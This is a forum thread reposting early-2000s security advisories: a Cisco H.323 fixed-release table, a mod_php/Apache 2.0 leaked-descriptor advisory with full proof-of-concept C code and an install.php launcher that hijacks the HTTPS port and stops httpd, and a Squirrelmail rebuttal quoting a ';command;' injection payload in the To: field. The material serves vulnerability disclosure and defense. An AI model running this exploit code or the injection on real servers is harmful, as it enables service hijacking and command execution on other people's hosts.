| | | E14, | | |
| | | | | |
| | IPFW | 12.1(13) | 12.1 | |
| | | E12, | (21.3)E | |
| | | | | |
| | | 12.1(14)E4, | | |
| | | | | |
| | | 12.1(19)E6, | | |
| | | | | |
| | | 12.1(20)E1 | | |
|--------+---------------+----------------------------------------|
| 12.1EA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EB | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | |  |
| 12.1EC | | No migration path |
| | | |
| | | No fixed release |
|--------+---------------+----------------------------------------|
| 12.1EV | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EW | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | | |
| 12.1EZ | | Not yet migrated |
| | | |
| | | No rebuild planned |
|--------+---------------+----------------------------------------|
| | Element | 12.1(5)T17 | | Migrate to |
| | | | | 12.2(19) |
| |---------------+-------------+-----------+--------------|
| 12.1T | NAT | 12.1(5)T17 | | Migrate to |
| | | | | 12.2(19) |
| |---------------+-------------+-----------+--------------|
| | IPFW | 12.1(5)T17 | | Migrate to |
| | | | | 12.2(19) |
|--------+--------------------------------------------------------|
| 12.1X | 12.1X releases generally migrate to 12.1T, 12.2 or |
| (l) | 12.2T as specified below. Please refer to specific |
| | train technical notes for documented migration path. |
|--------+--------------------------------------------------------|
```
| 12.1XA | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XB | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XC | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XD | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XF | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1XG | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XH | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XI | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XJ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XL | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XM | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.1XP | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XQ | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.1XR | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XT | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XU | | Vulnerable. Migrate to 12.2(4)T6 |
|--------+---------------+----------------------------------------|
| 12.1XV | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.1XW | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YB | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YC | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YD | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YE | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YF | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YH | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YI | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YJ | | Not Vulnerable |
|------------------------+----------------------------------------|
| 12.2-based Releases | Rebuild | Interim | Maintenance |
|------------------------+-------------+-----------+--------------|
| | | 12.2(10g), | | |
| | | | | |
| | Element | 12.2(13c), | | 12.2(17) |
| | | | | |
| | | 12.2(16a) | | |
| |---------------+-------------+-----------+--------------|
| | | 12.2(10g), | | |
| | | | | |
| | | 12.2(13c), | | |
| 12.2 | | | | |
| | | 12.2(16f) | | |
| | NAT | | | 12.2(19) |
| | | 12.2(17d) | | |
| | | | | |
| | | 12.2(19b) | | |
| | | | | |
| | | 12.2(21a) | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2B | | Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2BC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2BW | | Migrate to | | Migrate to |
| | | 12.2(15)T5 | | 12.3(1a) |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2BX | | |
| | | No migration path |
|--------+---------------+----------------------------------------|
| 12.2BZ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2CX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2CY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2DA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2DD | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2DX | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2JA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2MB | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2MC | | |
| | | No planned release |
|--------+---------------+----------------------------------------|
| 12.2MX | | Vulnerable. Migrate to 12.3(4)T1 |
|--------+---------------+----------------------------------------|
| | Element | 12.2(14)S3 | | 12.2(18)S |
| |---------------+-------------+-----------+--------------|
| | | 12.2(14)S7 | | |
| | | - available | | |
| | | 19-Jan-2004 | | |
| 12.2S | NAT | | | |
| | | 12.2(18)S3 | | |
| | | - available | | |
| | | 23-Feb-2004 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.2(17a) | | |
| | | SXA | | |
| |---------------+-------------+-----------+--------------|
| 12.2SX | NAT | 12.2(17a) | | |
| | | SXA | | |
| |---------------+----------------------------------------|
| | IPFW | TBD |
|--------+---------------+----------------------------------------|
| 12.2SY | | 12.2(14)SY3 | | |
|--------+---------------+----------------------------------------|
| 12.2SZ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | | | No more |
| | | 12.2(4)T6, | | maintenance |
| | | | | trains for |
| | | 12.2(8)T10, | | 12.2T are |
| | | | | planned. |
| | Element | 12.2(11)T9, | | Please |
| | | | | migrate to |
| | | 12.2(13)T5, | | the latest |
| | | | | 12.3 |
| | | 12.2(15)T2 | | Mainline |
| | | | | release. |
| |---------------+-------------+-----------+--------------|
| | | | | No more |
| | | 12.2(4)T6, | | maintenance |
| | | | | trains for |
| | | 12.2(8)T10, | | 12.2T are |
| | | | | planned. |
| 12.2T | NAT | 12.2(11)T8, | | Please |
| | | | | migrate to |
| | | 12.2(13)T3, | | the latest |
| | | | | 12.3 |
| | | 12.2(15)T5 | | Mainline |
| | | | | release. |
| |---------------+-------------+-----------+--------------|
| | | | | No more |
| | | | | maintenance |
| | | | | trains for |
| | | | | 12.2T are |
| | | | | planned. |
| | IPFW | 12.2(4)T8 | | Please |
| | | | | migrate to |
| | | | | the latest |
| | | | | 12.3 |
| | | | | Mainline |
| | | | | release. |
|--------+---------------+----------------------------------------|
| 12.2XA | | Vulnerable. Migrate to 12.2(11)T9 |
|--------+---------------+----------------------------------------|
| 12.2XB | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.2XC | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2XD | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XE | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2XF | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2XG | | Vulnerable. Migrate to 12.2(8)T10 |
|--------+---------------+----------------------------------------|
| 12.2XH | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XI | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XJ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XK | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XL | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XM | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XN | | Vulnerable. Migrate to 12.2(11)T9 |
|--------+---------------+----------------------------------------|
| 12.2XQ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XS | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.2XT | | Vulnerable. Migrate to 12.2(11)T9 |
|--------+---------------+----------------------------------------|
| 12.2XU | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XW | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| | Element | 12.2(4)YA7 | | |
| |---------------+----------------------------------------|
| 12.2YA | NAT | Not Vulnerable |
| |---------------+----------------------------------------|
| | IPFW | 12.2(4)YA8 | | |
|--------+---------------+----------------------------------------|
| 12.2YB | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YC | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YD | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YE | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YF | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YG | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YH | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YJ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YK | | Vulnerable. Migrate to 12.2(13)ZC |
|--------+---------------+----------------------------------------|
| 12.2YL | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YM | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YN | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YO | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YP | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YQ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YR | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YS | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YT | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YU | | Vulnerable. Migrate to 12.3(4)T1 |
|--------+---------------+----------------------------------------|
| 12.2YV | | Vulnerable. Migrate to 12.3(4)T1 |
|--------+---------------+----------------------------------------|
| | Element | 12.2(8)YW3 | | |
| |---------------+-------------+-----------+--------------|
| 12.2YW | NAT | 12.2(8)YW3 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Migrate to 12.2(S) Release 3 |
| 12.2YX | | |
| | | or migrate to 12.2(14)SU March-2004 |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2YY | | |
| | | Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YZ | | Vulnerable. Rebuilds available upon |
| | | request. |
|--------+---------------+----------------------------------------|
| 12.2ZA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2ZB | | |
| | | Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2ZC | | |
| | | Not yet planned |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | | |
| 12.2ZD | | No Migration path |
| | | |
| | | No planned fix |
|--------+---------------+----------------------------------------|
| 12.2ZE | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2ZF | | Vulnerable. Migrate to 12.2(15)SL1 |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | | |
| 12.2ZG | | No Migration path |
| | | |
| | | No planned fix |
|--------+---------------+----------------------------------------|
| | Element | 12.2(13)ZH3 | | |
| |---------------+-------------+-----------+--------------|
| 12.2ZH | NAT | | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.2(15)ZJ3 | | |
| |---------------+-------------+-----------+--------------|
| 12.2ZJ | NAT | 12.2(15)ZJ2 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.2(15)ZL1 | | |
| |---------------+-------------+-----------+--------------|
| 12.2ZL | NAT | | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2ZM | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2ZP | | Not Vulnerable |
|------------------------+----------------------------------------|
| 12.3-based Releases | Rebuild | Interim | Maintenance |
|------------------------+----------------------------------------|
| 12.3 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | Not Vulnerable to H.323 endpoint/ |
| | | gateway/gatekeeper issues |
| |---------------+----------------------------------------|
| 12.3T | | 12.3(2)T3 | | |
| | NAT | | | |
| | | 12.3(4)T1 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable to IOS FW issue |
+-----------------------------------------------------------------+



Cisco Software - Non IOS

In all cases, customers should exercise caution to confirm that the
devices to be upgraded contain sufficient memory and that current hardware
and software configurations will continue to be supported properly by the
new software release. If the information is not clear, contact the Cisco
TAC for assistance as shown in the Obtaining Fixed Software section.


Cisco CallManager

+------------------------------------------+
| Cisco CallManager | First Fixed Regular |
| Version | Release |
|--------------------+---------------------|
| 3.1 | 3.1(4b)spD |
|--------------------+---------------------|
| 3.2 | 3.2(3) |
|--------------------+---------------------|
| | 3.3(2)spC |
| 3.3 | |
| | 3.3(3) |
+------------------------------------------+


Cisco Conference Connection

There are currently no software fixes planned for Cisco Conference
Connection (CCC). Customers running CCC should implement a workaround to
limit H.323 traffic from trusted hosts only. A workaround for this may be
found in the Workarounds section.


Cisco Internet Service Node

There are currently no software fixes planned for Cisco Internet Service
Node (ISN). Customers running ISN should implement a workaround to limit
H.323 traffic from trusted hosts only. A workaround for this may be found
in the Workarounds section.


Cisco 7905 Series IP Phone

These defects have been resolved in Version 1.0(1) of the 7905 H.323 phone
firmware load. The version 1.0(1) image names containing the fixes are
cp790501001h323031212a.sbin for the signed image and
cp790501001h323031212a.zup for the unsigned image.


Cisco ATA18x Series Analog Telephony Devices

These defects have been resolved in software version 2.16.1.


Cisco BTS 10200

The Cisco BTS 10200 has software fixes available in version 4.1. Customers
who have deployed the BTS 10200 should follow the instructions below in
the Obtaining Fixed Software section to contact TAC in order to obtain the
fixed software version.

Obtaining Fixed Software
========================

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com/.

Customers whose Cisco products are provided or maintained through prior or
existing agreement with third-party support organizations such as Cisco
Partners, authorized resellers, or service providers should contact that
support organization for assistance with the upgrade, which should be free
of charge.

Customers who purchase direct from Cisco but who do not hold a Cisco
service contract and customers who purchase through third-party vendors
bu

----------


## Mick Flemm

*PHP 4.2.x / 4.3.x @ Apache 2.0*


Product: PHP - mod_php
Versions: 4.2.x, 4.3.x / apache 2.0.x
URL: http://www.php.net
Impact: Daemon Hijacking
Bug class: Leaked Descriptor
Vendor notified: Yes
Fix available: No
Date: 12/26/03


Issue:
======
Mod_php under apache 2.0.x leaks a critical file descriptor that can be used to takeover (hijack) the https service.


Details:
========
Because apache httpd and mod_php are inter-related, I
don't know if you would consider this an apache bug or
a mod_php bug. I've contacted each group and they both 
blame each other. Personally, I don't care whose fault 
it is so long as it gets fixed.

When using mod_php, many file descriptors are leaked to the php script process. If the script page calls external programs by passthru(), exec(), or system(), the descriptors are leaked to that program as well.

One of these descriptors is the listening descriptor to port 443, also known as https. Port 443 is a privileged port and can only be bound to by a root process. It is not normal for that descriptor to be leaked to any or all programs. As a side note, this descriptor seems to be opened by apache regardless of whether or not you use https.

The bug is caused by not making a call to fcntl with the CLOEXEC flag to prevent the leak of a privileged file descriptor. ( It really is a 1 line fix ! )


Impact:
=======
The listening descriptor is used by all sites on the same machine. If a person can ftp in an executable and has access to php, they may be able to hijack the https service for all sites on the machine. Sandboxing and jailing may not help since the descriptor itself is leaked to the child.

"Safe_mode = on" does not offer any protection for this problem if safe_mode_exec_dir points to a directory that can be ftp'd to.


Exploit:
========
The technique is simple. 

1) Fork and daemonize yourself.
2) Select on the leaked descriptor and start serving pages.

At the end of this advisory is a proof-of-concept program that you can run under mod_php. It is assumed that paying customers can ftp anything they want into their website and mod_php scripting is enabled.

To see the problem first hand, compile the C code:

```
gcc -o leak-sploit leak-sploit.c -lssl
cp leak-sploit /var/www/html
cp install.php /var/www/html
cp foo-cert.pem /var/www/html

lynx http://localhost/install.php
```

Now, ps -ef to see how things are going:

```
root 18176 1 6 15:58 ? 00:00:01 /usr/sbin/httpd
apache 18180 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18181 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18182 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18183 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18184 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18191 1 0 15:58 ? 00:00:00 /var/www/html/leak-sploit
```

So far, so good...

```
lynx https://localhost
```

And you should see the "You're owned" message.

This was tested on a fully up2date Red Hat 8.0 & 9 system.


Solution:
=========
There is no vendor provided solution.

I filed http://bugs.php.net/bug.php?id=20302 on Nov 7, 2002. In retrospect, the bug report is not as detailed as I would like it to have been today, but no one from the php project seemed genuinely interested in investigating this problem.

I also contacted the apache project in August 2002 about this same problem. In October 2002, I re-contacted them about leaked descriptors, they confirmed the problem. Feb 2003 the leaked file descriptors were reported by myself to vuln-dev mail list. The bug was partially fixed in apache 2.0.45. The 
mod_php vector however is still unfixed.

To see if you are vulnerable, you can use the env_audit program. It comes with directions for testing mod_php in the examples directory.

http://www.web-insights.net/env_audit


Best Regards,
Steve Grubb


The code................

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/*
 * The basic actions are like this:
 * 1) Become session leader
 * 2) Get rid of the parent (apache)
 * 3) Start handling requests
 */

/* Descriptor number of the leaked port-443 listening socket */
#define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF "/var/www/html/foo-cert.pem"

static SSL_CTX *ctx;
static SSL *ssl;
static const SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
    /* Need to fork so apache doesn't kill us */
    if (fork() == 0) {
        /* Become session leader */
        setsid();
        sleep(2);

        /* just in case one was a controlling tty */
        close(0); close(1); close(2);
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    else
    {
        /* Parent: stop the real httpd so only the child answers on 443 */
        sleep(1);
        system("/usr/sbin/httpd -k stop");
        sleep(1);
    }
    return 0;
}

static void server_loop(int descr)
{
    fd_set read_mask;

    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        /* select() rewrites the set, so rebuild it before every call */
        FD_ZERO(&read_mask);
        FD_SET(descr, &read_mask);
        if (select(descr + 1, &read_mask, NULL, NULL, NULL) == -1)
            continue;
        fd = accept(descr, (struct sockaddr *)&remote, &len);
        if (fd >= 0) {
            char obuf[1024];
            if ((ssl = SSL_new(ctx)) != NULL) {
                SSL_set_fd(ssl, fd);
                SSL_set_accept_state(ssl);
                if (SSL_accept(ssl) <= 0)
                    exit(1);

                /* Minimal HTTP/1.0 reply; the body is 39 bytes long */
                strcpy(obuf, "HTTP/1.0 200 OK\n");
                strcat(obuf, "Content-Length: 39\n");
                strcat(obuf, "Content-Type: text/html\n\n");
                strcat(obuf, "<html><body>You're owned!</body></html>");
                SSL_write(ssl, obuf, strlen(obuf));
                SSL_set_shutdown(ssl,
                                 SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
                SSL_free(ssl);
                ERR_remove_state(0);
            }
            close(fd);
        }
    }
    SSL_CTX_free(ctx); /* Never gets called */
}

static void ssl_init(void)
{
    SSL_load_error_strings();
    SSLeay_add_ssl_algorithms();
    meth = SSLv23_server_method();
    ctx = SSL_CTX_new(meth);
    if (!ctx)
        exit(1);
    if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0)
        exit(1);
    if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0)
        exit(1);
    if (!SSL_CTX_check_private_key(ctx))
        exit(1);
}
```


install.php.....

```
<html><head>
<title>leak-sploit for PHP 4.3</title>
</head>
<body>
<?php
print('Installing exploit.
');
passthru("/var/www/html/leak-sploit");
?>
</body></html>
```

----------


## Mick Flemm

*Squirrelmail*


Bugtraq Security Systems released an advisory on Dec 24th to the Full
Disclosure email list about a possible Command Injection Issue in the GPG
subsystem of Squirrelmail. Please note that Bugtraq Security Systems Inc
has no affiliation with the well-regarded official Bugtraq list at
securityfocus.com.

Original full text of the advisory here:
http://www.bugtraq.org/advisories/_BSSADV-0001.txt
"Command Injection Issue in Squirrelmail"
and here:
http://archives.neohapsis.com/archives/ ... /3777.html
"Bugtraq Security Systems XMAS Advisory 0001"

Secunia also copied it here:
http://www.secunia.com/advisories/10493/
"Squirrelmail Address Parsing Execution of Arbitrary Commands"

There are many problems with this 'advisory'. We'll deal with the
technical details first, and then move on to the rest of it.

Summary:
The authors of the original 'advisory' claim arbitrary code execution with
the currently released version of Squirrelmail and the GPG Plugin. This
is false. They also claim arbitrary code execution with current CVS
version of the Squirrelmail and GPG code. This is also false. They
further claim to have attempted to contact the Squirrelmail 'product team'
'several times' before releasing their vulnerability report. This is also
false. No attempt was made to contact any member of the GPG Plugin
team, nor was any contact made with members of the core Squirrelmail
development team or any of the Squirrelmail development lists.

Despite these inaccuracies and the carefully timed release of a faulty
'advisory' during the Christmas holiday, we looked into it immediately.

Details:
> Adding a ";command;" to the To: line of a newly created e-mail and
> then clicking "encrypt now" will execute the command as the Apache
> user on recent versions of Squirrelmail, including the current CVS
> version. Example:
>
> To: ;echo "YO, dudes. Static analysis ain't rocket science." >>
> /tmp/message;
> <click encrypt now to execute!>

Upon digging further, we have discovered that the code for the reported
exploit existed within Squirrelmail itself, previous to version 1.4.2
during the address parsing.

This is within the rfc822Header object, using the parseAddress function.
The parseAddress code in Squirrelmail 1.4.0 does not properly completely
remove the command noted in the 'advisory' and previous comments. 
However, even Squirrelmail 1.4.0 does munge the attack enough to not
exactly function the way the 'advisory' claims.

It is possible that an exploit similar to the one reported in the
'advisory' could potentially be exploitable with GPG Plugin v 1.1 and SM v
1.4.0.

As of Squirrelmail 1.4.2 this attack is completely unsuccessful.

Squirrelmail 1.4.2 was released on Oct 01, 2003.

Since squirrelmail 1.4.2 contains other security updates, and has been
released for some time, it is HIGHLY recommended that administrators
upgrade immediately anyway.

We plan to investigate this issue more thoroughly in the next day or two,
and potentially update the Squirrelmail parseAddress function to even more
robustly handle potentially malicious code.

Updates as we continue to work towards further securing the GPG Plugin and
the Squirrelmail parseAddress function will be posted on the GPG Plugin
Bugzilla at:

http://www.braverock.com/bugzilla/show_bug.cgi?id=139

> This particular example is within the GPG subsystem of
> Squirrelmail, often installed by security "experts"
> who in actuality have the information security knowledge of
> cat food.

The GPG Plugin for Squirrelmail is not intended for 'security experts'. 
The GPG Plugin is a convenience feature only for the 'average' web mail
user. It does not claim to be a super high security method of encrypting
email. It is better than sending postcards across the network. The
documentation and online help for the GPG Plugin explicitly warn users
against storing their primary private keys (if they have them) on an
untrusted or unsecured webmail server. The GPG Plugin for Squirrelmail is
not intended to replace or remove the need for stand-alone, off-line key
management and basic key security for mission critical keys.

> The pictures located at http://www.bugtraq.org/images/demo1.png and
> http://www.bugtraq.org/images/demo2.png demonstrate the newest Bugtraq
> Security Systems software analysis platform. This product, BSS Data
> Tracer, allows a software security analysis team to perform automated
> checks against many common types of vulnerabilities in both binary and
> source code targets.
>
> As the screen shots referenced above show, this product can save
> thousands of hours of testing and analysis, providing a significant
> return on investment for software development groups. It uses
> "tainting" technology which applies data-flow analysis rules to
> variables within the program. If a "tainted" variable reaches a
> vulnerable API call, such as exec, system, or strcpy, then that place
> is marked. A report is then generated for the perusal of security
> staff. It should be noted that Bugtraq Security Systems Data Tracer is
> a "static analysis" tool, and does not require the program to be
> installed or run.

We do not appreciate your grand-standing for product placement.

Please get your facts straight.

> Bugtraq Security have attempted to contact the vendor multiple times
> since the discovery of these vulnerabilities without success. In
> addition, after contacting Weld Pond and Pieter Mudge Zatko

My email and the email of the GPG Plugin team are clearly indicated in the
GPG Plugin README, and on the Squirrelmail web site. No one attempted to
contact me or any member of the GPG Plugin team on this issue.

Further, no attempt was made by 'Bugtraq Security Inc' to contact any of
the official Squirrelmail lists. Communication with the Squirrelmail
development team leads confirms that none of them were contacted either.

Other individuals that the 'advisory' claims were contacted have also
responded that they were not contacted about this release.

So, to summarize the technical issues, the vulnerability reported in the
'advisory' is not completely valid at all, but could potentially be
exploitable with GPG Plugin v 1.1 and SM v 1.4.0. Please note that these
are old versions of both the Squirrelmail code and the GPG Plugin. The
claim in the 'advisory' that a vulnerability exists: 'on recent versions
of Squirrelmail, including the current CVS version.' is just plain false.

To the members of the "Bugtraq Research Team": The members of the GPG
Plugin and Squirrelmail development teams feel that it is a bad policy to
release 'advisories' with so many inaccuracies and outright lies. Please
refrain from doing so in the future.

Regards,

- Brian Peterson
GPG Plugin Team Lead
Squirrelmail Core Development Team Member

SquirrelMail is a popular standards-based webmail package written in PHP4.
It includes built-in pure PHP support for the IMAP and SMTP protocols.

It is available at:
http://www.squirrelmail.org/

The GPG Plugin for Squirrelmail adds most commonly used GPG encryption and
decryption functions to Squirrelmail for the convenience of Squirrelmail
users. It is available on the Squirrelmail website and from the GPG
Plugin development site at:
http://www.braverock.com/gpg/

----------


## Exoticom

*ProFTPD Critical Bugs* 

http://proftpd.linux.co.uk/critbugs.html
http://xforce.iss.net/xforce/alerts/id/154

----------


## Mick Flemm

Deprecated...

----------

